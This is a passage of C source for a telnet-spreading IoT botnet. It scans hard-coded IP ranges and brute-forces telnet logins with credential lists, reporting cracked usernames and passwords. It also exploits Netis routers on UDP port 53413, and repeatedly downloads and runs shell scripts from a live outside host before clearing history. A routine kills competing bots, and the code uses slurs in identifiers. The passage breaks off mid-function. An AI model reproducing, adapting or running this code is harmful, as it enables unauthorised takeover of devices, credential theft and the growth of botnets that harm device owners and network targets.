  954. if(randnum == 99)
  955. {
  956. szprintf(ip, "78.188.%d.%d", ipState[3], ipState[4]);
  957. }
  958. if(randnum == 100)
  959. {
  960. szprintf(ip, "45.127.%d.%d", ipState[3], ipState[4]);
  961. }
  962. if(randnum == 101)
  963. {
  964. szprintf(ip, "103.30.%d.%d", ipState[3], ipState[4]);
  965. }
  966. if(randnum == 102)
  967. {
  968. szprintf(ip, "14.33.%d.%d", ipState[3], ipState[4]);
  969. }
  970. if(randnum == 103)
  971. {
  972. szprintf(ip, "123.16.%d.%d", ipState[3], ipState[4]);
  973. }
  974. if(randnum == 104)
  975. {
  976. szprintf(ip, "202.44.%d.%d", ipState[3], ipState[4]);
  977. }
  978. if(randnum == 105)
  979. {
  980. szprintf(ip, "116.93.%d.%d", ipState[3], ipState[4]);
  981. }
  982. if(randnum == 106)
  983. {
  984. szprintf(ip, "91.83.%d.%d", ipState[3], ipState[4]);
  985. }
  986. if(randnum == 107)
  987. {
  988. szprintf(ip, "41.253.%d.%d", ipState[3], ipState[4]);
  989. }
  990. if(randnum == 108)
  991. {
  992. szprintf(ip, "117.173.%d.%d", ipState[3], ipState[4]);
  993. }
  994. if(randnum == 109)
  995. {
  996. szprintf(ip, "113.190.%d.%d", ipState[3], ipState[4]);
  997. }
  998. if(randnum == 110)
  999. {
  1000. szprintf(ip, "146.88.%d.%d", ipState[3], ipState[4]);
  1001. }
  1002. if(randnum == 111)
  1003. {
  1004. szprintf(ip, "112.196.%d.%d", ipState[3], ipState[4]);
  1005. }
  1006. if(randnum == 112)
  1007. {
  1008. szprintf(ip, "113.178.%d.%d", ipState[3], ipState[4]);
  1009. }
  1010. if(randnum == 113)
  1011. {
  1012. szprintf(ip, "112.45.%d.%d", ipState[3], ipState[4]);
  1013. }
  1014. if(randnum == 114)
  1015. {
  1016. szprintf(ip, "183.223.%d.%d", ipState[3], ipState[4]);
  1017. }
  1018. if(randnum == 115)
  1019. {
  1020. szprintf(ip, "116.71.%d.%d", ipState[3], ipState[4]);
  1021. }
  1022. if(randnum == 116)
  1023. {
  1024. szprintf(ip, "103.44.%d.%d", ipState[3], ipState[4]);
  1025. }
  1026. if(randnum == 117)
  1027. {
  1028. szprintf(ip, "110.235.%d.%d", ipState[3], ipState[4]);
  1029. }
  1030. if(randnum == 118)
  1031. {
  1032. szprintf(ip, "124.253.%d.%d", ipState[3], ipState[4]);
  1033. }
  1034. if(randnum == 119)
  1035. {
  1036. szprintf(ip, "211.237.%d.%d", ipState[3], ipState[4]);
  1037. }
  1038. if(randnum == 120)
  1039. {
  1040. szprintf(ip, "117.175.%d.%d", ipState[3], ipState[4]);
  1041. }
  1042. if(randnum == 121)
  1043. {
  1044. szprintf(ip, "117.173.%d.%d", ipState[3], ipState[4]);
  1045. }
  1046. if(randnum == 122)
  1047. {
  1048. szprintf(ip, "178.93.%d.%d", ipState[3], ipState[4]);
  1049. }
  1050. if(randnum == 123)
  1051. {
  1052. szprintf(ip, "111.9.%d.%d", ipState[3], ipState[4]);
  1053. }
  1054. if(randnum == 124)
  1055. {
  1056. szprintf(ip, "222.252.%d.%d", ipState[3], ipState[4]);
  1057. }
  1058. if(randnum == 125)
  1059. {
  1060. szprintf(ip, "113.174.%d.%d", ipState[3], ipState[4]);
  1061. }
  1062. if(randnum == 126)
  1063. {
  1064. szprintf(ip, "222.252.%d.%d", ipState[3], ipState[4]);
  1065. }
  1066. if(randnum == 127)
  1067. {
  1068. szprintf(ip, "113.160.%d.%d", ipState[3], ipState[4]);
  1069. }
  1070. if(randnum == 128)
  1071. {
  1072. szprintf(ip, "113.161.%d.%d", ipState[3], ipState[4]);
  1073. }
  1074. if(randnum == 129)
  1075. {
  1076. szprintf(ip, "113.162.%d.%d", ipState[3], ipState[4]);
  1077. }
  1078. if(randnum == 130)
  1079. {
  1080. szprintf(ip, "113.163.%d.%d", ipState[3], ipState[4]);
  1081. }
  1082. if(randnum == 131)
  1083. {
  1084. szprintf(ip, "113.164.%d.%d", ipState[3], ipState[4]);
  1085. }
  1086. if(randnum == 132)
  1087. {
  1088. szprintf(ip, "113.165.%d.%d", ipState[3], ipState[4]);
  1089. }
  1090. if(randnum == 133)
  1091. {
  1092. szprintf(ip, "113.166.%d.%d", ipState[3], ipState[4]);
  1093. }
  1094. if(randnum == 134)
  1095. {
  1096. szprintf(ip, "113.167.%d.%d", ipState[3], ipState[4]);
  1097. }
  1098. if(randnum == 135)
  1099. {
  1100. szprintf(ip, "113.168.%d.%d", ipState[3], ipState[4]);
  1101. }
  1102. if(randnum == 136)
  1103. {
  1104. szprintf(ip, "113.169.%d.%d", ipState[3], ipState[4]);
  1105. }
  1106. if(randnum == 137)
  1107. {
  1108. szprintf(ip, "123.17.%d.%d", ipState[3], ipState[4]);
  1109. }
  1110. if(randnum == 138)
  1111. {
  1112. szprintf(ip, "123.18.%d.%d", ipState[3], ipState[4]);
  1113. }
  1114. if(randnum == 139)
  1115. {
  1116. szprintf(ip, "123.19.%d.%d", ipState[3], ipState[4]);
  1117. }
  1118. if(randnum == 140)
  1119. {
  1120. szprintf(ip, "123.20.%d.%d", ipState[3], ipState[4]);
  1121. }
  1122. if(randnum == 141)
  1123. {
  1124. szprintf(ip, "123.21.%d.%d", ipState[3], ipState[4]);
  1125. }
  1126. if(randnum == 142)
  1127. {
  1128. szprintf(ip, "123.22.%d.%d", ipState[3], ipState[4]);
  1129. }
  1130. if(randnum == 143)
  1131. {
  1132. szprintf(ip, "222.252.%d.%d", ipState[3], ipState[4]);
  1133. }
  1134. if(randnum == 144)
  1135. {
  1136. szprintf(ip, "222.253.%d.%d", ipState[3], ipState[4]);
  1137. }
  1138. if(randnum == 145)
  1139. {
  1140. szprintf(ip, "222.254.%d.%d", ipState[3], ipState[4]);
  1141. }
  1142. if(randnum == 146)
  1143. {
  1144. szprintf(ip, "222.255.%d.%d", ipState[3], ipState[4]);
  1145. }
  1146. if(randnum == 147)
  1147. {
  1148. szprintf(ip, "37.247.%d.%d", ipState[3], ipState[4]);
  1149. }
  1150. if(randnum == 148)
  1151. {
  1152. szprintf(ip, "41.208.%d.%d", ipState[3], ipState[4]);
  1153. }
  1154. if(randnum == 149)
  1155. {
  1156. szprintf(ip, "183.220.%d.%d", ipState[3], ipState[4]);
  1157. }
  1158. if(randnum == 150)
  1159. {
  1160. szprintf(ip, "175.201.%d.%d", ipState[3], ipState[4]);
  1161. }
  1162. if(randnum == 151)
  1163. {
  1164. szprintf(ip, "103.198.%d.%d", ipState[3], ipState[4]);
  1165. }
  1166. if(randnum == 152)
  1167. {
  1168. szprintf(ip, "183.223.%d.%d", ipState[3], ipState[4]);
  1169. }
  1170. if(randnum == 153)
  1171. {
  1172. szprintf(ip, "50.205.%d.%d", ipState[3], ipState[4]);
  1173. }
  1174. if(randnum == 154)
  1175. {
  1176. szprintf(ip, "88.248.%d.%d", ipState[3], ipState[4]);
  1177. }
  1178. if(randnum == 155)
  1179. {
  1180. szprintf(ip, "88.105.%d.%d", ipState[3], ipState[4]);
  1181. }
  1182. if(randnum == 156)
  1183. {
  1184. szprintf(ip, "88.247.%d.%d", ipState[3], ipState[4]);
  1185. }
  1186. if(randnum == 157)
  1187. {
  1188. szprintf(ip, "85.105.%d.%d", ipState[3], ipState[4]);
  1189. }
  1190. if(randnum == 158)
  1191. {
  1192. szprintf(ip, "188.3.%d.%d", ipState[3], ipState[4]);
  1193. }
  1194. if(randnum == 159)
  1195. {
  1196. szprintf(ip, "103.203.%d.%d", ipState[3], ipState[4]);
  1197. }
  1198. if(randnum == 160)
  1199. {
  1200. szprintf(ip, "103.55.%d.%d", ipState[3], ipState[4]);
  1201. }
  1202. if(randnum == 161)
  1203. {
  1204. szprintf(ip, "103.220.%d.%d", ipState[3], ipState[4]);
  1205. }
  1206. if(randnum == 162)
  1207. {
  1208. szprintf(ip, "183.233.%d.%d", ipState[3], ipState[4]);
  1209. }
  1210. if(randnum == 163)
  1211. {
  1212. szprintf(ip, "103.242.%d.%d", ipState[3], ipState[4]);
  1213. }
  1214. if(randnum == 164)
  1215. {
  1216. szprintf(ip, "103.198.%d.%d", ipState[3], ipState[4]);
  1217. }
  1218. if(randnum == 165)
  1219. {
  1220. szprintf(ip, "103.14.%d.%d", ipState[3], ipState[4]);
  1221. }
  1222. if(randnum == 166)
  1223. {
  1224. szprintf(ip, "103.195.%d.%d", ipState[3], ipState[4]);
  1225. }
  1226. if(randnum == 167)
  1227. {
  1228. szprintf(ip, "103.203.%d.%d", ipState[3], ipState[4]);
  1229. }
  1230. if(randnum == 168)
  1231. {
  1232. szprintf(ip, "103.214.%d.%d", ipState[3], ipState[4]);
  1233. }
  1234. if(randnum == 169)
  1235. {
  1236. szprintf(ip, "103.218.%d.%d", ipState[3], ipState[4]);
  1237. }
  1238. if(randnum == 171)
  1239. {
  1240. szprintf(ip, "103.225.%d.%d", ipState[3], ipState[4]);
  1241. }
  1242. if(randnum == 172)
  1243. {
  1244. szprintf(ip, "103.228.%d.%d", ipState[3], ipState[4]);
  1245. }
  1246. if(randnum == 173)
  1247. {
  1248. szprintf(ip, "103.231.%d.%d", ipState[3], ipState[4]);
  1249. }
  1250. if(randnum == 174)
  1251. {
  1252. szprintf(ip, "103.60.%d.%d", ipState[3], ipState[4]);
  1253. }
  1254. if(randnum == 175)
  1255. {
  1256. szprintf(ip, "103.248.%d.%d", ipState[3], ipState[4]);
  1257. }
  1258. if(randnum == 176)
  1259. {
  1260. szprintf(ip, "103.253.%d.%d", ipState[3], ipState[4]);
  1261. }
  1262. if(randnum == 177)
  1263. {
  1264. szprintf(ip, "103.255.%d.%d", ipState[3], ipState[4]);
  1265. }
  1266. if(randnum == 178)
  1267. {
  1268. szprintf(ip, "103.35.%d.%d", ipState[3], ipState[4]);
  1269. }
  1270. if(randnum == 179)
  1271. {
  1272. szprintf(ip, "103.49.%d.%d", ipState[3], ipState[4]);
  1273. }
  1274. if(randnum == 180)
  1275. {
  1276. szprintf(ip, "103.62.%d.%d", ipState[3], ipState[4]);
  1277. }
  1278. if(randnum == 181)
  1279. {
  1280. szprintf(ip, "144.48.%d.%d", ipState[3], ipState[4]);
  1281. }
  1282. if(randnum == 182)
  1283. {
  1284. szprintf(ip, "163.47.%d.%d", ipState[3], ipState[4]);
  1285. }
  1286. if(randnum == 183)
  1287. {
  1288. szprintf(ip, "163.53.%d.%d", ipState[3], ipState[4]);
  1289. }
  1290. if(randnum == 184)
  1291. {
  1292. szprintf(ip, "223.29.%d.%d", ipState[3], ipState[4]);
  1293. }
  1294. if(randnum == 185)
  1295. {
  1296. szprintf(ip, "59.153.%d.%d", ipState[3], ipState[4]);
  1297. }
  1298. if(randnum == 186)
  1299. {
  1300. szprintf(ip, "113.176.%d.%d", ipState[3], ipState[4]);
  1301. }
  1302. if(randnum == 187)
  1303. {
  1304. szprintf(ip, "113.175.%d.%d", ipState[3], ipState[4]);
  1305. }
  1306. if(randnum == 188)
  1307. {
  1308. szprintf(ip, "113.177.%d.%d", ipState[3], ipState[4]);
  1309. }
  1310. if(randnum == 189)
  1311. {
  1312. szprintf(ip, "113.183.%d.%d", ipState[3], ipState[4]);
  1313. }
  1314. if(randnum == 190)
  1315. {
  1316. szprintf(ip, "202.164.%d.%d", ipState[3], ipState[4]);
  1317. }
  1318. if(randnum == 191)
  1319. {
  1320. szprintf(ip, "203.134.%d.%d", ipState[3], ipState[4]);
  1321. }
  1322. if(randnum == 192)
  1323. {
  1324. szprintf(ip, "210.56.%d.%d", ipState[3], ipState[4]);
  1325. }
  1326. if(randnum == 193)
  1327. {
  1328. szprintf(ip, "49.156.%d.%d", ipState[3], ipState[4]);
  1329. }
  1330. if(randnum == 194)
  1331. {
  1332. szprintf(ip, "203.210.%d.%d", ipState[3], ipState[4]);
  1333. }
  1334. if(randnum == 195)
  1335. {
  1336. szprintf(ip, "117.181.%d.%d", ipState[3], ipState[4]);
  1337. }
  1338. if(randnum == 196)
  1339. {
  1340. szprintf(ip, "117.178.%d.%d", ipState[3], ipState[4]);
  1341. }
  1342. if(randnum == 197)
  1343. {
  1344. szprintf(ip, "117.177.%d.%d", ipState[3], ipState[4]);
  1345. }
  1346. if(randnum == 198)
  1347. {
  1348. szprintf(ip, "117.176.%d.%d", ipState[3], ipState[4]);
  1349. }
  1350. if(randnum == 199)
  1351. {
  1352. szprintf(ip, "117.170.%d.%d", ipState[3], ipState[4]);
  1353. }
  1354. if(randnum == 200)
  1355. {
  1356. szprintf(ip, "117.171.%d.%d", ipState[3], ipState[4]);
  1357. }
  1358. if(randnum == 201)
  1359. {
  1360. szprintf(ip, "117.162.%d.%d", ipState[3], ipState[4]);
  1361. }
  1362. if(randnum == 201)
  1363. {
  1364. szprintf(ip, "112.26.%d.%d", ipState[3], ipState[4]);
  1365. }
  1366. if(randnum == 202)
  1367. {
  1368. szprintf(ip, "112.27.%d.%d", ipState[3], ipState[4]);
  1369. }
  1370. if(randnum == 203)
  1371. {
  1372. szprintf(ip, "112.28.%d.%d", ipState[3], ipState[4]);
  1373. }
  1374. if(randnum == 204)
  1375. {
  1376. szprintf(ip, "112.29.%d.%d", ipState[3], ipState[4]);
  1377. }
  1378. if(randnum == 205)
  1379. {
  1380. szprintf(ip, "112.30.%d.%d", ipState[3], ipState[4]);
  1381. }
  1382. if(randnum == 206)
  1383. {
  1384. szprintf(ip, "112.31.%d.%d", ipState[3], ipState[4]);
  1385. }
  1386. if(randnum == 207)
  1387. {
  1388. szprintf(ip, "203.150.%d.%d", ipState[3], ipState[4]);
  1389. }
  1390. if(randnum == 208)
  1391. {
  1392. szprintf(ip, "50.233.%d.%d", ipState[3], ipState[4]);
  1393. }
  1394. if(randnum == 209)
  1395. {
  1396. szprintf(ip, "27.255.%d.%d", ipState[3], ipState[4]);
  1397. }
  1398. if(randnum == 210)
  1399. {
  1400. szprintf(ip, "103.54.%d.%d", ipState[3], ipState[4]);
  1401. }
  1402. if(randnum == 211)
  1403. {
  1404. szprintf(ip, "103.204.%d.%d", ipState[3], ipState[4]);
  1405. }
  1406. if(randnum == 212)
  1407. {
  1408. szprintf(ip, "123.24.%d.%d", ipState[3], ipState[4]);
  1409. }
  1410. if(randnum == 212)
  1411. {
  1412. szprintf(ip, "123.25.%d.%d", ipState[3], ipState[4]);
  1413. }
  1414. if(randnum == 213)
  1415. {
  1416. szprintf(ip, "111.26.%d.%d", ipState[3], ipState[4]);
  1417. }
  1418. if(randnum == 214)
  1419. {
  1420. szprintf(ip, "111.20.%d.%d", ipState[3], ipState[4]);
  1421. }
  1422.  
  1423. return inet_addr(ip);
  1424. }
  1425. int Dickranges[] = {110,111,112,113,114,115,116,117,118,119,223,1,103,203,202,122,39,123,124,125,128,131,132,138,14,140,141,148,151,162.163,167,14,103,105,183,168,171,2,198,191,41,42,43,37,201,200,80,81,82,83,84,85,86,87,88,89,90};
  1426. in_addr_t NetisRanges()
  1427. {
  1428. int range = rand() % (sizeof(Dickranges)/sizeof(char *));
  1429. ipState[1] = Dickranges[range];
  1430. ipState[2] = rand() % 255;
  1431. ipState[3] = rand() % 255;
  1432. ipState[4] = rand() % 255;
  1433. char ip[16] = {0};
  1434. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
  1435. return inet_addr(ip);
  1436. }
  1437. in_addr_t HackerScan(in_addr_t netmask)
  1438. {
  1439. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
  1440. return tmp ^ ( rand_cmwc() & ~netmask);
  1441. }
  1442. unsigned short csum (unsigned short *buf, int count)
  1443. {
  1444. register uint64_t sum = 0;
  1445. while( count > 1 ) { sum += *buf++; count -= 2; }
  1446. if(count > 0) { sum += *(unsigned char *)buf; }
  1447. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
  1448. return (uint16_t)(~sum);
  1449. }
  1450. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
  1451. {
  1452. struct tcp_pseudo
  1453. {
  1454. unsigned long src_addr;
  1455. unsigned long dst_addr;
  1456. unsigned char zero;
  1457. unsigned char proto;
  1458. unsigned short length;
  1459. } pseudohead;
  1460. unsigned short total_len = iph->tot_len;
  1461. pseudohead.src_addr=iph->saddr;
  1462. pseudohead.dst_addr=iph->daddr;
  1463. pseudohead.zero=0;
  1464. pseudohead.proto=IPPROTO_TCP;
  1465. pseudohead.length=htons(sizeof(struct tcphdr));
  1466. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
  1467. unsigned short *tcp = malloc(totaltcp_len);
  1468. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
  1469. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
  1470. unsigned short output = csum(tcp,totaltcp_len);
  1471. free(tcp);
  1472. return output;
  1473. }
  1474. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
  1475. {
  1476. iph->ihl = 5;
  1477. iph->version = 4;
  1478. iph->tos = 0;
  1479. iph->tot_len = sizeof(struct iphdr) + packetSize;
  1480. iph->id = rand_cmwc();
  1481. iph->frag_off = 0;
  1482. iph->ttl = MAXTTL;
  1483. iph->protocol = protocol;
  1484. iph->check = 0;
  1485. iph->saddr = source;
  1486. iph->daddr = dest;
  1487. }
  1488. int sclose(int fd)
  1489. {
  1490. if(3 > fd) return 1;
  1491. close(fd);
  1492. return 0;
  1493. }
  1494. struct telstate_t
  1495. {
  1496. int fd;
  1497. unsigned int ip;
  1498. unsigned char state;
  1499. unsigned char complete;
  1500. unsigned char usernameInd;
  1501. unsigned char passwordInd;
  1502. unsigned int totalTimeout;
  1503. unsigned short bufUsed;
  1504. char *sockbuf;
  1505. };
  1506. const char* get_telstate_host(struct telstate_t* telstate)
  1507. {
  1508. struct in_addr in_addr_ip;
  1509. in_addr_ip.s_addr = telstate->ip;
  1510. return inet_ntoa(in_addr_ip);
  1511. }
  1512. int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings)
  1513. {
  1514. int num_bytes, i;
  1515. memset(buffer, 0, buf_size);
  1516. num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
  1517. if(buffer[0] == 0xFF)
  1518. {
  1519. negotiate(fd, buffer, 3);
  1520. }
  1521. if(contains_string(buffer, strings))
  1522. {
  1523. return 1;
  1524. }
  1525. return 0;
  1526. }
  1527. int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size)
  1528. {
  1529. fd_set read_set;
  1530. struct timeval tv;
  1531. tv.tv_sec = 0;
  1532. tv.tv_usec = timeout_usec;
  1533. FD_ZERO(&read_set);
  1534. FD_SET(fd, &read_set);
  1535. if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
  1536. return 0;
  1537. return recv(fd, buffer, buf_size, 0);
  1538. }
  1539. int contains_success(char* buffer)
  1540. {
  1541. return contains_string(buffer, KGSVYGXA);
  1542. }
  1543. int contains_fail(char* buffer)
  1544. {
  1545. return contains_string(buffer, bhuhwys);
  1546. }
  1547. int contains_string(char* buffer, char** strings)
  1548. {
  1549. int num_strings = 0, i = 0;
  1550. for(num_strings = 0; strings[++num_strings] != 0; );
  1551. for(i = 0; i < num_strings; i++)
  1552. {
  1553. if(strcasestr(buffer, strings[i]))
  1554. {
  1555. return 1;
  1556. }
  1557. }
  1558. return 0;
  1559. }
  1560. //major improvments done by Jonah
  1561. void StartTheLelz() {
  1562. int i, res, j;
  1563. int wait_usec = 10;
  1564. int maxfds = 1000;
  1565. int max = maxfds;
  1566. char buf[128], cur_dir;
  1567. fd_set fdset;
  1568. struct timeval tv;
  1569. socklen_t lon;
  1570. int valopt;
  1571. srand(time(NULL) ^ rand_cmwc());
  1572. char line[256];
  1573. char* buffer;
  1574. struct sockaddr_in dest_addr;
  1575. dest_addr.sin_family = AF_INET;
  1576. dest_addr.sin_port = htons(23);
  1577. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1578. buffer = malloc(BUFFER_BITCH + 1);
  1579. memset(buffer, 0, BUFFER_BITCH + 1);
  1580. struct telstate_t fds[max];
  1581. memset(fds, 0, max * (sizeof(int) + 1));
  1582. for(i = 0; i < max; i++) {
  1583. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1584. fds[i].complete = 1;
  1585. fds[i].sockbuf = buffer; }
  1586. while(1) {
  1587. for(i = 0; i < max; i++) {
  1588. if(fds[i].totalTimeout == 0) {
  1589. fds[i].totalTimeout = time(NULL); }
  1590. switch(fds[i].state) {
  1591. case 0: {
  1592. if(fds[i].complete == 1) {
  1593. char *tmp = fds[i].sockbuf;
  1594. memset(&(fds[i]), 0, sizeof(struct telstate_t));
  1595. fds[i].sockbuf = tmp;
  1596. fds[i].ip = HackerScan2(); }
  1597. else if(fds[i].complete == 0) {
  1598. fds[i].passwordInd++;
  1599. fds[i].usernameInd++;
  1600. if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) {
  1601. fds[i].complete = 1;
  1602. continue; }
  1603. if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) {
  1604. fds[i].complete = 1;
  1605. continue; } }
  1606. dest_addr.sin_family = AF_INET;
  1607. dest_addr.sin_port = htons(23);
  1608. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1609. dest_addr.sin_addr.s_addr = fds[i].ip;
  1610. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
  1611. if(fds[i].fd == -1) continue;
  1612. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
  1613. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
  1614. sclose(fds[i].fd);
  1615. fds[i].complete = 1;
  1616. } else {
  1617. fds[i].state = 1;
  1618. fds[i].totalTimeout = 0;
  1619. }
  1620. }
  1621. break;
  1622. case 1: {
  1623. FD_ZERO(&fdset);
  1624. FD_SET(fds[i].fd, &fdset);
  1625. tv.tv_sec = 0;
  1626. tv.tv_usec = 10000;
  1627. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
  1628. if(res == 1) {
  1629. lon = sizeof(int);
  1630. valopt = 0;
  1631. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  1632. if(valopt) {
  1633. sclose(fds[i].fd);
  1634. fds[i].state = 0;
  1635. fds[i].complete = 1;
  1636. } else {
  1637. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
  1638. fds[i].totalTimeout = 0;
  1639. fds[i].bufUsed = 0;
  1640. memset(fds[i].sockbuf, 0, 1024);
  1641. fds[i].state = 2;
  1642. } continue; }
  1643. else if(res == -1) {
  1644. sclose(fds[i].fd);
  1645. fds[i].state = 0;
  1646. fds[i].complete = 1;
  1647. continue; }
  1648. if(fds[i].totalTimeout + 6 < time(NULL)) {
  1649. sclose(fds[i].fd);
  1650. fds[i].state = 0;
  1651. fds[i].complete = 1;
  1652. }
  1653. }
  1654. break;
  1655. case 2: {
  1656. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_BITCH, SGSGWUD)) {
  1657. if(contains_fail(fds[i].sockbuf)) {
  1658. fds[i].state = 0;
  1659. } else {
  1660. fds[i].state = 3; }
  1661. continue;
  1662. }
  1663. if(fds[i].totalTimeout + 6 < time(NULL)) {
  1664. fds[i].state = 0;
  1665. fds[i].complete = 1;
  1666. }
  1667. }
  1668. break;
  1669. case 3: {
  1670. if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
  1671. fds[i].state = 0;
  1672. fds[i].complete = 1;
  1673. continue; }
  1674. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
  1675. fds[i].state = 0;
  1676. fds[i].complete = 1;
  1677. continue; }
  1678. fds[i].state = 4;
  1679. }
  1680. break;
  1681. case 4: {
  1682. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_BITCH, SGSGWUD)) {
  1683. if(contains_fail(fds[i].sockbuf)) {
  1684. fds[i].state = 0;
  1685. } else {
  1686. fds[i].state = 5; }
  1687. continue; }
  1688. if(fds[i].totalTimeout + 6 < time(NULL)) {
  1689. fds[i].state = 0;
  1690. fds[i].complete = 1;
  1691. }
  1692. }
  1693. break;
  1694. case 5: {
  1695. if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
  1696. fds[i].state = 0;
  1697. fds[i].complete = 1;
  1698. continue; }
  1699. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
  1700. fds[i].state = 0;
  1701. fds[i].complete = 1;
  1702. continue; }
  1703. fds[i].state = 6; }
  1704. break;
  1705. case 6: {
  1706. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_BITCH, SGSGWUD2)) {
  1707. fds[i].totalTimeout = time(NULL);
  1708. if(contains_fail(fds[i].sockbuf)) {
  1709. fds[i].state = 0; }
  1710. else if(contains_success(fds[i].sockbuf)) {
  1711. if(fds[i].complete == 2) {
  1712. fds[i].state = 7;
  1713. } else {
  1714. HackerPrint(D1ckSucka, "\x1b[0;31mSuccessfully Bruteforced IP: \x1b[0;33m%s | \x1b[0;31mUsername: \x1b[0;33m%s | \x1b[0;31mPassword: \x1b[0;33m%s\x1b[0m", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1715. HackerPrint(D1ckSucka, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
  1716. fds[i].state = 7; }
  1717. } else {
  1718. fds[i].state = 0;
  1719. fds[i].complete = 1; }
  1720. continue; }
  1721. if(fds[i].totalTimeout + 7 < time(NULL)) {
  1722. fds[i].state = 0;
  1723. fds[i].complete = 1; } }
  1724. break;
  1725. case 7: {
  1726. fds[i].totalTimeout = time(NULL);
  1727. if(send(fds[i].fd, hvgsgd, strlen(hvgsgd), MSG_NOSIGNAL) < 0) {
  1728. sclose(fds[i].fd);
  1729. fds[i].state = 0;
  1730. fds[i].complete = 1;
  1731. continue; }
  1732. fds[i].complete = 3;
  1733. if(fds[i].totalTimeout + 60 < time(NULL)) {
  1734. if(fds[i].complete !=3){
  1735. }
  1736. fds[i].state = 0;
  1737. fds[i].complete = 1;
  1738. }
  1739. break;
  1740. }
  1741. }
  1742. }
  1743. }
  1744. }
  1745. //fixed by cheats
  1746. void StartTheNetis()
  1747. {
  1748. while(1){
  1749. char payload2[1024];
  1750. int clientSocket, portNum, nBytes;
  1751. struct sockaddr_in serverAddr;
  1752. socklen_t addr_size;
  1753. clientSocket = socket(PF_INET, SOCK_DGRAM, 0);
  1754. uint32_t ip;
  1755. ip = NetisRanges();
  1756. serverAddr.sin_family = AF_INET;
  1757. serverAddr.sin_port = htons(53413);
  1758. serverAddr.sin_addr.s_addr = ip;
  1759. memset(serverAddr.sin_zero, '\0', sizeof serverAddr.sin_zero);
  1760. addr_size = sizeof serverAddr;
  1761. sprintf(payload2, "%s cd /var/; rm -rf tftp; wget http://46.166.185.18 /tftp || tftp -r tftp -g 46.166.185.18 ; chmod 777 tftp; ./tftp; rm -rf tftp\x00", NETIS);
  1762. sendto(clientSocket,payload2,strlen(payload2),0,(struct sockaddr *)&serverAddr,addr_size);
  1763. }
  1764. }
  1765. //LOOPING PAYLOAD LOL IDFK WHY
  1766. void LoopPayload(){
  1767. int i;
  1768. for(i = 0; i < 9; i++){
  1769. system("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.166.185.18 /bins.sh ; chmod 777 bins.sh; sh bins.sh; tftp 46.166.185.18 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.166.185.18 ; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.166.185.18 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh;rm -rf *;history -c\r\n");
  1770. }
  1771. sleep(5);
  1772. }
  1773. //botkill
  1774. void botkiller(){
  1775. char* Niggerdirs[] = {"/dev/netslink/", "/tmp/", "/var/", "/dev/", "/var/run/", "/dev/shm/", "/mnt/", "/boot/", "/usr/", (char*) 0};//wtf are we doing here well these are the directory
  1776. char* Boats[] = {"wget", "armv*", "bot*", "ntpd*", "hackz*", "shitty*","jack*", "mips*", "sex*", "i86", "ssh*", "sh4*", "jackmeoff*", "tftp*", "i56", "mips", "mipsel", "sh4", "x86", "i686", "ppc", "i586", "i586"};
  1777. const char *bots[] = {"jackmy*", "busybox*", "bin*", "sex*", "tftp*", "arm*", "mipsel*", "mips*", "mips64*", "i686*","sparc*", "sh4*", "bot*", "jackmeoff*", "hackz*", "bruv*"};
  1778. char hacker[80];
  1779. char botkill[80];
  1780. char buf[128];
  1781. int i, num_tmps, j;
  1782. for(j = 0; j < num_tmps; j++)
  1783. {
  1784. memset(buf, 0, 128);
  1785. if(j == 0)
  1786. snprintf(buf, 127, ">%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve ;echo ps aux >> proc ; pkill -9 %d\r\n", Niggerdirs[j], Niggerdirs[j], Niggerdirs[j], bots[j]);
  1787. else
  1788. snprintf(buf, 127, ">%s.t && cd %s ; >retrieve\r\n", Niggerdirs[j], Niggerdirs[j], Niggerdirs[j]);
  1789. system(buf);
  1790. sprintf(botkill, "pkill -9 %s\r\n", bots[j]);
  1791. system(botkill);
